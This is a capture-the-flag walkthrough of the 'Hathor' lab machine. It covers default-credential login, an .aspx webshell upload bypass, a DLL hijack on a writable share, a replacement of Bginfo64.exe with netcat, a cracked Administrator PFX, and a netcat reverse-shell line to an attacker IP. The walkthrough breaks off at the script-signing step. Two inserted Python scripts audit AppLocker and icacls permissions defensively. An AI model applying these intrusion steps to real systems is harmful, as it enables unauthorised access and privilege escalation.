Doing Sekhmet before this machine is very helpful, but it is still very hard. We get shells as several different users, so this writeup is divided by user instead of the usual layout.
Windcorp\web Shell
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.71.218
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 11:28 EDT
Nmap scan report for 10.129.71.218
Host is up (0.0070s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
49701/tcp open unknown
Let's also do a detailed scan of the open ports, because I don't want to miss anything on this machine.
$ sudo nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sC -sV -O --min-rate 3000 10.129.71.218
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 29 disallowed entries (15 shown)
| /CaptchaImage.ashx* /Admin/ /App_Browsers/ /App_Code/
| /App_Data/ /App_Themes/ /bin/ /Blog/ViewCategory.aspx$
| /Blog/ViewArchive.aspx$ /Data/SiteImages/emoticons /MyPage.aspx
|_/MyPage.aspx$ /MyPage.aspx* /NeatHtml/ /NeatUpload/
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Home - mojoPortal
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-11 15:30:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
The first thing we notice is the hostname, hathor.windcorp.htb, in the windcorp.htb domain. This one host has DNS, Kerberos, LDAP and the Global Catalog open, so it is most likely the DC itself. We can add the hostname and domain name to our /etc/hosts file.
Web Enum -> Default Creds
Port 80 shows a corporate page that is still under construction:
At the bottom of the page, there's a link that brings us to a login page on the website:
Viewing the page source reveals this is a mojoPortal instance:
A quick Google search for mojoPortal exploits and default credentials led to this:
Surprisingly, this worked!
Admin Panel -> Move RCE
The administrator panel lets us edit the pages and what is shown:
This is an IIS server, so uploading an .aspx reverse shell might work. Head to File Manager > Upload Files:
Uploading the .aspx file directly doesn't work.
If we rename it to cmd.txt, it works.
Then it shows up here:
Interestingly, there's a Move function as well, which we can try to use to rename the file to cmd.aspx.
Renaming it to cmd.aspx seems to work:
Anyways, we can access our webshell using this CVE:
However, getting ANY shell fails to work. Similar to Sekhmet (which I actually solved before this), there's some kind of firewall in use here that is blocking us.
Firewall + AppLocker Enum
Since this machine came out before Sekhmet, which also had AppLocker, we can run some PowerShell enumeration to find out what exactly is allowed:
This generates a large XML policy listing what we can and cannot execute.
Here is what is allowed for files and binaries:
<FilePathRule Id="059bf360-e712-427a-8255-59d182bc4cd5" Name="%OSDRIVE%\share\scripts\7-zip64.dll" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
<FilePathRule Id="3a07aecc-17f3-43e5-911b-ddb7e4d7353f" Name="%OSDRIVE%\Get-bADpasswords\PSI\Psi_x64.dll" Description="" UserOrGroupSid="S-1-5-21-3783586571-2109290616-3725730865-10102" Action="Allow">
<AppLockerPolicy Version="1"><RuleCollection Type="Appx" EnforcementMode="Enabled"><FilePublisherRule Id="a9e18c21-ff8f-43cf-b9fc-db40eed693ba" Name="(Default Rule) All signed packaged apps" Description="Allows members of the Everyone group to run packaged apps that are signed." UserOrGroupSid="S-1-1-0" Action="Allow">
I don't think it's possible to replace these DLLs, and even if for some reason I have write access, I cannot restart these processes. Also, unsigned binaries like nc.exe won't run properly.
In this case, we can try some better webshells that don't rely on external binaries to run.
Insomnia shell is a fully implemented web shell that can give us a reverse shell without the use of external binaries. We can upload this one and try again.
Using this, we can get a reverse shell as web.
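The rules above are the interesting part of the policy: an Allow path rule that points at a location outside %WINDIR% and %PROGRAMFILES% only does what the administrator intended if that location is not writable by ordinary users. The script below is an added example (not from the writeup or from Microsoft) that audits an exported AppLocker policy for exactly that pattern. The sample policy is constructed by hand from the two DLL rules and the Appx rule shown above; the %WINDIR% default rule, its placeholder GUID and the Conditions elements are my additions, since the writeup only shows the opening tags.

```python
"""Audit an AppLocker policy export for Allow FilePathRules that point outside
administrator-only locations (added example, not code from the writeup)."""
import xml.etree.ElementTree as ET

# Constructed sample policy. The two %OSDRIVE% rules and the Appx rule are the
# fragments shown in the writeup; the %WINDIR% rule (placeholder GUID) and the
# Conditions elements are filled in by hand so the document parses.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Dll" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="(constructed) All DLLs in the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="059bf360-e712-427a-8255-59d182bc4cd5" Name="%OSDRIVE%\share\scripts\7-zip64.dll" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%OSDRIVE%\share\scripts\7-zip64.dll" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="3a07aecc-17f3-43e5-911b-ddb7e4d7353f" Name="%OSDRIVE%\Get-bADpasswords\PSI\Psi_x64.dll" Description="" UserOrGroupSid="S-1-5-21-3783586571-2109290616-3725730865-10102" Action="Allow">
      <Conditions><FilePathCondition Path="%OSDRIVE%\Get-bADpasswords\PSI\Psi_x64.dll" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Appx" EnforcementMode="Enabled">
    <FilePublisherRule Id="a9e18c21-ff8f-43cf-b9fc-db40eed693ba" Name="(Default Rule) All signed packaged apps" Description="Allows members of the Everyone group to run packaged apps that are signed." UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="0.0.0.0" HighSection="*" /></FilePublisherCondition></Conditions>
    </FilePublisherRule>
  </RuleCollection>
</AppLockerPolicy>"""

# Path prefixes that are normally writable only by administrators and SYSTEM.
# Any Allow rule outside these needs its NTFS ACL checked by hand.
PROTECTED_PREFIXES = ("%WINDIR%\\", "%PROGRAMFILES%\\")

# Well-known SID for Everyone: a rule scoped to it reaches every principal.
EVERYONE_SID = "S-1-1-0"


def find_risky_path_rules(policy_xml):
    """Return one (collection_type, rule_id, path, sid, applies_to_everyone)
    tuple per Allow FilePathRule whose path is outside PROTECTED_PREFIXES."""
    root = ET.fromstring(policy_xml)
    findings = []
    for collection in root.findall("RuleCollection"):
        if collection.get("EnforcementMode") == "NotConfigured":
            continue  # rules in an unenforced collection have no effect
        for rule in collection.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            for cond in rule.iter("FilePathCondition"):
                path = cond.get("Path", "")
                if path.upper().startswith(PROTECTED_PREFIXES):
                    continue
                sid = rule.get("UserOrGroupSid", "")
                findings.append((collection.get("Type"), rule.get("Id"),
                                 path, sid, sid == EVERYONE_SID))
    return findings


if __name__ == "__main__":
    for ctype, rule_id, path, sid, everyone in find_risky_path_rules(SAMPLE_POLICY):
        scope = "Everyone" if everyone else sid
        print(f"[{ctype}] {rule_id}: {path} allowed for {scope}; verify the NTFS ACL")
```

On a real host the input would be the XML written out by Get-AppLockerPolicy -Effective -Xml; each reported path is a candidate for the kind of check the writeup performs with icacls later on.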
GinaWild Shell
Bad Passwords -> User Creds
Earlier, I saw some kind of Powershell script called Get-bADpasswords in use, so let's find that.
STATUS_NOT_SUPPORTED is an error that turns out to be a recurring theme throughout this machine. A bit of research reveals that it is returned because NTLM authentication is disabled on this machine.
This means that only Kerberos tickets will work for authenticating to this machine. We have to use kinit to get a ticket, similar to another machine, Absolute. We need to include this within our /etc/krb5.conf file:
Then we can run kinit and give it the credentials we got earlier:
$ kinit BeatriceMill
Password for BeatriceMill@WINDCORP.HTB:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: BeatriceMill@WINDCORP.HTB
Valid starting Expires Service principal
05/11/2023 12:19:27 05/11/2023 22:19:27 krbtgt/WINDCORP.HTB@WINDCORP.HTB
renew until 05/12/2023 12:19:22
Great! Now we can finally view the shares:
$ smbclient -L //hathor.windcorp.htb -U BeatriceMill -N -k
WARNING: The option -k|--kerberos is deprecated!
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
share Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to hathor.windcorp.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We can connect using smbclient.py.
$ impacket-smbclient -k 'windcorp.htb/BeatriceMill:!!!!ilovegood17@hathor.windcorp.htb'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
share
SYSVOL
SMB Enumeration -> DLL Hijack
Within the share named share, we find the following:
# use share
# ls
drw-rw-rw- 0 Thu May 11 12:17:42 2023 .
drw-rw-rw- 0 Tue Apr 19 08:45:15 2022 ..
-rw-rw-rw- 1013928 Thu May 11 12:18:02 2023 AutoIt3_x64.exe
-rw-rw-rw- 4601208 Thu May 11 12:21:31 2023 Bginfo64.exe
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 scripts
# cd scripts
# ls
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 .
drw-rw-rw- 0 Thu May 11 12:17:42 2023 ..
-rw-rw-rw- 1076736 Thu May 11 12:22:41 2023 7-zip64.dll
-rw-rw-rw- 54739 Sun Jan 23 05:54:21 2022 7Zip.au3
-rw-rw-rw- 2333 Sun Jan 23 05:54:21 2022 ZipExample.zip
-rw-rw-rw- 1794 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example.au3
-rw-rw-rw- 1855 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example_using_Callback.au3
-rw-rw-rw- 334 Sun Jan 23 05:54:21 2022 _7ZipDelete_Example.au3
-rw-rw-rw- 859 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example.au3
-rw-rw-rw- 1867 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example_using_Callback.au3
-rw-rw-rw- 830 Sun Jan 23 05:54:21 2022 _7ZIPExtract_Example.au3
-rw-rw-rw- 2027 Sun Jan 23 05:54:21 2022 _7ZipFindFirst__7ZipFindNext_Example.au3
-rw-rw-rw- 372 Sun Jan 23 05:54:21 2022 _7ZIPUpdate_Example.au3
-rw-rw-rw- 886 Sun Jan 23 05:54:21 2022 _Archive_Size.au3
-rw-rw-rw- 201 Sun Jan 23 05:54:21 2022 _CheckExample.au3
-rw-rw-rw- 144 Sun Jan 23 05:54:21 2022 _GetZipListExample.au3
-rw-rw-rw- 498 Sun Jan 23 05:54:21 2022 _MiscExamples.au3
So that's where the 7-zip64.dll file is located. One of the things I noticed is that we can write to it, so we can perform a DLL hijacking attack here. Because of AppLocker, I think that msfvenom-generated DLLs won't work, so let's create our own.
I grabbed this script from Hacktricks, and we can build it within VS Code in our Windows machine. Afterwards, we can grab this DLL and place it within the share.
# put 7-zip64.dll
# ls
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 .
drw-rw-rw- 0 Thu May 11 22:57:42 2023 ..
-rw-rw-rw- 10240 Thu May 11 23:05:19 2023 7-zip64.dll
-rw-rw-rw- 54739 Sun Jan 23 05:54:21 2022 7Zip.au3
-rw-rw-rw- 2333 Sun Jan 23 05:54:21 2022 ZipExample.zip
-rw-rw-rw- 1794 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example.au3
-rw-rw-rw- 1855 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example_using_Callback.au3
-rw-rw-rw- 334 Sun Jan 23 05:54:21 2022 _7ZipDelete_Example.au3
-rw-rw-rw- 859 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example.au3
-rw-rw-rw- 1867 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example_using_Callback.au3
-rw-rw-rw- 830 Sun Jan 23 05:54:21 2022 _7ZIPExtract_Example.au3
-rw-rw-rw- 2027 Sun Jan 23 05:54:21 2022 _7ZipFindFirst__7ZipFindNext_Example.au3
-rw-rw-rw- 372 Sun Jan 23 05:54:21 2022 _7ZIPUpdate_Example.au3
-rw-rw-rw- 886 Sun Jan 23 05:54:21 2022 _Archive_Size.au3
-rw-rw-rw- 201 Sun Jan 23 05:54:21 2022 _CheckExample.au3
-rw-rw-rw- 144 Sun Jan 23 05:54:21 2022 _GetZipListExample.au3
-rw-rw-rw- 498 Sun Jan 23 05:54:21 2022 _MiscExamples.au3
Afterwards, we wait a bit and then check the C:\Windows\Tasks folder. Eventually, the DLL does create a file:
C:\Windows\Tasks>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of C:\Windows\Tasks
05/12/2023 05:12 AM <DIR> .
04/19/2022 02:44 PM <DIR> ..
05/12/2023 05:12 AM 19 whoami.txt
1 File(s) 19 bytes
2 Dir(s) 9,334,525,952 bytes free
C:\Windows\Tasks>type whoami.txt
type whoami.txt
Access is denied.
I can't read it, meaning this is probably another user. There seems to be a really aggressive script that is cleaning this up every minute, because it wasn't long before this file disappeared. While waiting, I checked the AppLocker policy for the .exe files:
It seems that this file can be run regardless of what it is. Now that we have RCE as another user, let's try to enumerate who this user is and what they can do. Since the Bginfo64.exe file can be run, let's see if we can overwrite it with our own file like nc.exe.
After a while, the files are created. Here's the interesting output:
C:\Users\Public>type whoami.txt
USER INFORMATION
----------------
User Name SID
================= ==============================================
windcorp\ginawild S-1-5-21-3783586571-2109290616-3725730865-2663
<TRUNCATED>
WINDCORP\ITDep Group S-1-5-21-3783586571-2109290616-3725730865-9601 Mandatory group, Enabled by default, Enabled group
C:\Users\Public>type icacls.txt
C:\share\Bginfo64.exe NT AUTHORITY\IUSR:(I)(N)
BUILTIN\IIS_IUSRS:(I)(N)
WINDCORP\web:(I)(N)
BUILTIN\Administrators:(I)(M,WO,DC)
NT AUTHORITY\SYSTEM:(I)(F)
WINDCORP\ITDep:(I)(RX,WO)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
It appears that the user is ginawild, who is a member of the ITDep group. This user also has Write Owner (WO) rights over the Bginfo64.exe file. That means we can take ownership of the file, replace it with nc.exe, change the permissions to let everyone execute it, and then execute it to gain a reverse shell as ginawild.
Before doing so, we need to get the file over. SMB wasn't going to work as something keeps closing our connection, and PowerShell itself is heavily restricted. So, let's re-use the file upload vulnerability we found earlier and upload our nc64.exe to the website.
After waiting for a little bit, we will get a shell back!
We can now grab the user flag.
Bpassrunner Shell
Recycle Bin -> PFX Crack
Within the main C:\ directory, there are some files within the Recycle Bin.
c:\>dir /a
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\
02/14/2022 08:48 PM <DIR> $Recycle.Bin
04/19/2022 02:24 PM <DIR> $WinREAgent
c:\$Recycle.Bin>dir /a
dir /a
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\$Recycle.Bin
02/14/2022 08:48 PM <DIR> .
04/19/2022 02:45 PM <DIR> ..
02/14/2022 08:48 PM <DIR> S-1-5-18
10/07/2021 12:51 AM <DIR> S-1-5-21-3783586571-2109290616-3725730865-2359
10/13/2022 09:11 PM <DIR> S-1-5-21-3783586571-2109290616-3725730865-2663
10/13/2022 09:05 PM <DIR> S-1-5-21-3783586571-2109290616-3725730865-500
We can only access one of the directories, and it just has a bunch of .pfx files.
c:\$Recycle.Bin\S-1-5-21-3783586571-2109290616-3725730865-2663>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\$Recycle.Bin\S-1-5-21-3783586571-2109290616-3725730865-2663
10/12/2022 09:26 PM 98 $IZIX7VV.pfx
03/21/2022 04:37 PM 4,053 $RLYS3KF.pfx
10/12/2022 08:43 PM 4,280 $RZIX7VV.pfx
To transfer the files, we can copy them over to the C:\share directory and download them from SMB. file identifies all three as generic data:
$ file *.pfx
$IZIX7VV.pfx: data
$RLYS3KF.pfx: data
$RZIX7VV.pfx: data
Since all three are PFX files, let's use pfx2john to extract hashes and crack them with john. One of the passwords is found:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Loaded hashes with cost 1 (iteration count) varying from 2000 to 2048
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abceasyas123 ($RLYS3KF.pfx)
Now we can use openssl to read more information about this:
So this certificate belongs to the Administrator. Since we have the Administrator's .pfx, we can actually use it: in the AppLocker publisher rules, the certificate subject matches one of the conditions:
This means that we can run 'any program' if we import this into the Certificate Store of the machine. The question is, what script do we run?
Script Hijack -> Shell
I was still curious about the Get-bADpasswords.ps1 script: what was the point of it? I checked its ACL and found that I could overwrite it:
c:\Get-bADpasswords>icacls Get-bADpasswords.ps1
icacls Get-bADpasswords.ps1
Get-bADpasswords.ps1 WINDCORP\ITDep:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
We have Modify access to this file. So in this case, we can replace it with our own and then sign it using the certificate. I downloaded it and made a small edit at the top to use our Bginfo64.exe file (which is still nc.exe) to gain another reverse shell.
C:\share\Bginfo64.exe -e cmd.exe 10.10.14.13 5555
Afterwards, we can re-upload this to SMB and use copy to overwrite the existing script. Now, we need to sign the script.
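Both privilege escalations in this section and the previous one come down to the same ACL defect: a non-administrator group (ITDep) holds Write Owner on an executable that AppLocker allows, and Modify on a script that a privileged account runs. The script below is an added example (not from the writeup) that parses icacls output and reports every ACE where a principal other than Administrators, SYSTEM or TrustedInstaller holds a right that can change the file's content, owner or ACL. The two samples are the Bginfo64.exe and Get-bADpasswords.ps1 listings from the writeup, re-typed by hand with the indentation icacls normally prints; the parser assumes the file path contains no spaces.

```python
"""Flag NTFS ACEs that let non-administrators modify a file, from icacls
output (added example, not part of the writeup)."""
import re

# Constructed samples: the two icacls listings shown in the writeup.
BGINFO_ICACLS = r"""C:\share\Bginfo64.exe NT AUTHORITY\IUSR:(I)(N)
                      BUILTIN\IIS_IUSRS:(I)(N)
                      WINDCORP\web:(I)(N)
                      BUILTIN\Administrators:(I)(M,WO,DC)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      WINDCORP\ITDep:(I)(RX,WO)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files"""

SCRIPT_ICACLS = r"""Get-bADpasswords.ps1 WINDCORP\ITDep:(I)(M)
                     NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(RX)"""

# Rights that let the holder change the file's content, ACL or owner:
# full, modify, write, delete, write data, append data, write DAC, write owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}

# Principals expected to hold write rights on system and shared binaries.
TRUSTED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM",
           "NT SERVICE\\TrustedInstaller"}

# "<principal>:(flag)(flag)...(rights)" as printed by icacls.
ENTRY_RE = re.compile(r"^(?P<principal>[^:()]+):(?P<groups>(?:\([^)]*\))+)$")


def parse_icacls(text):
    """Return (path, principal, inheritance_flags, rights) for each ACE in
    the icacls output of a single file. Assumes the path has no spaces."""
    path = None
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if path is None:
            # First line is "<path> <first ACE>"; later lines are ACEs only.
            path, line = line.split(None, 1)
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        *flags, rights = groups  # last group is the rights list
        entries.append((path, m.group("principal"), flags, rights.split(",")))
    return entries


def risky_entries(text):
    """Return (path, principal, risky_rights) for every ACE where an
    untrusted principal holds at least one right from WRITE_RIGHTS."""
    findings = []
    for path, principal, _flags, rights in parse_icacls(text):
        if principal in TRUSTED:
            continue
        risky = [r for r in rights if r in WRITE_RIGHTS]
        if risky:
            findings.append((path, principal, risky))
    return findings


if __name__ == "__main__":
    for sample in (BGINFO_ICACLS, SCRIPT_ICACLS):
        for path, who, rights in risky_entries(sample):
            print(f"{path}: {who} holds {','.join(rights)} (non-admin write access)")
```

Note that (N) entries are reported as harmless and (RX) alone never triggers a finding; Write Owner is included because, as the writeup shows, owning a file is enough to rewrite its ACL and then its contents.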